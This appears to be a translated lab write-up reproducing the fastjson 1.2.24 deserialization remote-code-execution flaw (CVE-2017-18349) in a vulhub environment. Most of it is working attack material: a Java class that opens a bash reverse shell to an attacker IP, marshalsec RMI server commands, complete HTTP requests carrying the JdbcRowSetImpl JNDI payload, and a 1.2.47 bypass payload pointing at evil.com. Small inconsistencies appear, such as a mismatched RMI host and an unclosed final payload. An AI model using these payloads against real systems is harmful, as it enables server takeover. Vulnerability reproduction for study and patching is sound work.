Fastjson 1.2.24 deserialization (CVE-2017-18349) vulnerability recurrence

Introduction to fastjson

fastjson is Alibaba's open source JSON parsing library. It can parse strings in JSON format, support serialization of Java Beans into JSON strings, or deserialize from JSON strings to JavaBeans.

Sphere of influence

fastjsonfastjson <= 1.2.24

Vulnerability recurrence

After using vulhub and
cd /app/vulhub-20201028/fastjson/1.2.24-rce
docker to start and
docker-compose up -d
pull the image, visit IP:8090
, you can see the output in json format
http://192.168.1.38:8090
Insert picture description here

Create a new TouchFile.java and compile it into a class file.

import java.lang.Runtime;
import java.lang.Process;

public class TouchFile {
   static {
       try {
   		Runtime r = Runtime.getRuntime();
   		Process p = r.exec(new String[]{"/bin/bash","-c","bash -i >& /dev/tcp/192.168.1.43/4444 0>&1"});
   		p.waitFor();
       } catch (Exception e) {
           // do nothing
       }
   }
}

Insert picture description here

javac TouchFile.java
Use python to open the site
python -m SimpleHTTPServer 1234
http://192.168.1.43:1234/TouchFile.class
Insert picture description here

Then with the help of the marshalsec project, start an RMI server, monitor port 9999, and plan to load the remote class TouchFile.class.
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.1.43:1234/#TouchFile" 9999
Insert picture description here

Send request packet

POST / HTTP/1.1
Host: 192.168.1.38:8090
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 162

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.43:9999/TouchFile",
        "autoCommit":true
    }
}

Insert picture description here

POST / HTTP/1.1
Host: 192.168.1.38:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 162

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://192.168.1.38:8888/TouchFile",
        "autoCommit":true
    }
}

Insert picture description here

The difference between 1.2.47 and 1.2.24's recurrence process

Sending Payload to the shooting range server is not the same, the other processes are the same, 1.2.47 pyload:

{
    "a":{
        "@type":"java.lang.Class",
        "val":"com.sun.rowset.JdbcRowSetImpl"
    },
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"rmi://evil.com:9999/Exploit",
        "autoCommit":true
 }